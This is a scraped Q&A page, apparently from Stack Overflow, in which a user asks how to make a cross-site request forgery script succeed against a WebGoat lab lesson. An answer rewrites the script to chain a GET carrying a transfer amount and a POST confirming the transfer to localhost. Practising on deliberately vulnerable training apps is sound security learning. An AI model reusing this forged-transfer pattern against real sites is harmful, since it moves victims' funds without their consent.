JavaScript's XMLHttpRequest

My attempt to bypass the WebGoat prompt involved using a combination of code with XMLHttpRequest to send multiple requests, one using GET and the other using POST. The code snippet is as follows:

<script>
  var req1 = new XMLHttpRequest();
  req1.onreadystatechange = function() {

    if (req1.readyState == 4 && req1.status == 200) {

      req2 = new XMLHttpRequest();
      req2.open("POST", "http://localhost:8080/WebGoat/attack?Screen=32&menu=900", false);
      req2.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); // needs to be specified for POST requests
      req2.send("transferFunds=CONFIRM");

    }

  };
  req1.open("GET", "http://localhost:8080/WebGoat/attack?Screen=32&menu=900&transferFunds=4000", false);
  req1.send();
</script>

Upon saving this code as an file and opening it, no requests other than the initial GET request with status 302 are being made. How can I modify this code to ensure its successful execution? Browser used: Firefox 40.0.3 WebGoat Version: 6.0.1

javascript

Answer №1

If you're looking to improve efficiency, consider chaining requests together.

The process involves executing the first request and then proceeding to the next only if the callback function returns a status of 200 (OK).

An example has been provided below:

(function() {


  // Custom implementation of XMLHttpRequest object for handling requests.
  function sendServer(options) {
    var newXHR = new XMLHttpRequest() || new ActiveXObject("Microsoft.XMLHTTP");
    options.async = true;
    options.contentType = options.contentType || "application/x-www-form-urlencoded";
    newXHR.open(options.type, options.url, options.async || true);
    newXHR.setRequestHeader("Content-Type", options.contentType);
    newXHR.send((options.type == "POST") ? options.data : null);
    newXHR.onreadystatechange = options.callback;
    return newXHR;
  }



  // Usage:

  // First request: GET
  sendServer({
    type: "GET",
    url: "http://localhost:8080/WebGoat/attack?Screen=32&menu=900&transferFunds=4000",
    data: null,
    async: false,
    callback: function(xhr) {
      if (xhr.target.readyState === 4 && xhr.target.status === 200) {

        // Second request: POST
        sendServer({
          type: "POST",
          url: "http://localhost:8080/WebGoat/attack?Screen=32&menu=900",
          data: "transferFunds=CONFIRM",
          async: false,
          callback: function(xhr) {
            if (xhr.target.readyState === 4 && xhr.target.status === 200) {
              console.log(xhr.target.responseText); // Check the response.
            }
          }
        });
      }
    }
  });



})();

For further details, see the reference link: http://jsfiddle.net/dannyjhonston/jppz5nk3/1/

Similar questions

If you have not found the answer to your question or you are interested in this topic, then look at other similar questions below or use the search

What is the trick to incorporating nested tabs within tabs?

My tabs are functional and working smoothly. To view the jsfiddle, click here - http://jsfiddle.net/K3WVG/ I am looking for a way to add nested tabs within the existing tabs. I would prefer a CSS/HTML solution, but a JavaScript/jQuery method is also acce ...

javascriptjqueryhtmltabs

Assistance needed in obtaining the ID of a specific table row using jQuery

Currently, I am working on an AJAX request using Jquery and PHP. The task involves looping through an array to generate a table. During each iteration, a new ID is assigned to the table row. When users click on the "read me" link, additional content is f ...

phpjavascriptjquery

Ajax is updating the initial row of an HTML table while the subsequent rows remain unchanged and retain their default values upon modification

I need help with updating the status of a user, similar to what is discussed in this post. The issue I am facing is that only the first row of the table updates correctly. Regardless of the selected value from the dropdown list on other rows, the displaye ...

javascriptjqueryajax

Executing two nested loops with a delay in jQuery

I am currently working on a script that sends an ajax post to another page. I need to run two for loops before sending the ajax request with a timeout. The first loop is successful, but when I try to run the second loop, all requests are sent at the same ...

javascriptjqueryajax

Combining strings within a string after a specific word with nested Concatenation

In a given string variable "str," I am looking to concatenate another string between "InsertAfterMe" and "InsertBeforeMe". str="This is a string InsertAfterMe InsertBeforeMe" s1="sometext" s2="soMoreText" aList=[1,2,3,4,5] The concatenated string shoul ...

javascriptjquery

Retrieving data from the firebase database by filtering based on the child's specific value

Looking at the firebase database, I can see that only the 'name' field is available. Now, I am trying to retrieve the 'quantity' value associated with that specific 'name'. Can someone provide me with a sample firebase query i ...

javascriptfirebasefirebase-realtime-database

Add a prefix to a value entered by the user

I need help with adding a prefix to an input field value using Jquery. I want the input field value to be submitted as "Referrer Email: {email address}" where the {email address} part will be dynamic. The snippet below is what I found, but I'm having ...

javascriptjqueryforms

Continuously running React useEffect even with an empty dependency array

In my React application, I have implemented a hook system. Each sub-hook that is generated within this main hook is assigned a unique ID automatically. This ID is incremented by 1 every time a new sub-hook is created, ensuring uniqueness. const App = ...

javascriptreactjsreact-hooks

Ways to adjust the positioning of an image

Seeking assistance, I am currently working on building a portfolio using HTML while following a tutorial. I utilized undraw to insert an image but unfortunately, the image is fixed to the right-hand side: I would like to position the image below my icons, ...

javascripthtmlcss

I am encountering the error message "Utils is not defined" while attempting to generate a chart using chart.js

Attempting to replicate the example provided in chart.js documentation : link to example Unfortunately, I am encountering the error: Uncaught ReferenceError: Utils is not defined Despite its simplicity, I am struggling to identify the issue...! ...

javascriptchart.js

Guide on applying a filter to the items in a listbox using the input from a text box

In my HTML form, I have the following elements: 1) A list box containing filenames: s1.txt2013 s2.txt2013 s3.txt2012 s4.txt2012 2) A text box where the user enters a pattern (e.g. 2013) 3) A button By default, the list box contains the 4 file ...

javascripthtml

Angular 5 - Strategies for excluding specific properties from Observable updates

Currently, I am in the process of developing a webpage where users can view and like various videos. The video content and user likes are stored in a database, and I have implemented two Angular services for handling data retrieval and storage. However, I ...

javascriptangularangular5angular2-observables

How can we store data coming from PHP using AJAX and update the color of a div whenever new data is inserted?

Hey there, I'm currently working on a project where I need to save values and display them using Ajax after inserting them into a MySQL table using PHP. However, I'm having trouble with the alert function not working as expected. Let me share my ...

javascriptphpjquerymysqlajax

Issue: Unable to 'locate' or 'access' ./lib/React folder while utilizing webpack

I've been delving into the world of React for a while now and decided to experiment with integrating it with webpack. Below is my webpack.config.js : var path = require('path'); module.exports = { entry: './app.js', outp ...

javascriptreactjswebpack

Passing data from client to express.js using Javascript

I'm having trouble sending a variable from a JavaScript application to a Node.js server. Here's the code snippet: //client side $.get('http://smart-shopper.ro/messages?from=lastGeneralTimeStamp', datas => { console.log("dat ...

javascriptnode.jsexpress

Mongoose schema nesting guide

I've encountered an issue while attempting to nest schemas in mongoose, and unfortunately I'm struggling to pinpoint the exact cause. Here's what my current setup looks like. Starting with the parent schema: const Comment = require("./Comm ...

javascriptexpressmongoose

What exactly is the purpose of editing a host file?

After reviewing this repository, an automatic message pops up: Don't forget to modify your host file 127.0.0.1 * http://localhost:3001 What exactly does that entail? ...

javascriptnpmhost

Ways to discreetly conceal forward and backward buttons in the v-pagination component of Vuetify

Is there a way to remove the previous and next buttons from v-pagination in Vuetify? Here's my code snippet- <v-pagination v-model="page" :length="pageCount" :total-visible="8" color="primary" /> ...

javascriptvue.jsnuxt.jsvuetify.js

JavaScript issue: "No relay configuration found" error specifically occurs in Internet Explorer versions 7 and 8

Encountering issues with loading JavaScript only on specific pages in Internet Explorer. Safari, Firefox, and Chrome render the page correctly. Debugging revealed the following errors: 1) No relay set (used as window.postMessage targetOrigin), cannot send ...

javascriptjqueryinternet-explorerdebuggingpostmessage

Using the 'client-side rendering' and runtime environment variables in Next.js with the App Router

In the documentation for next.js, it's mentioned that runtime environment variables can be utilized on dynamically rendered pages. The test scenario being discussed involves a Next.js 14 project with an app router. On the page below, the environment ...

javascriptdockernext.jsdocker-composeenvironment-variables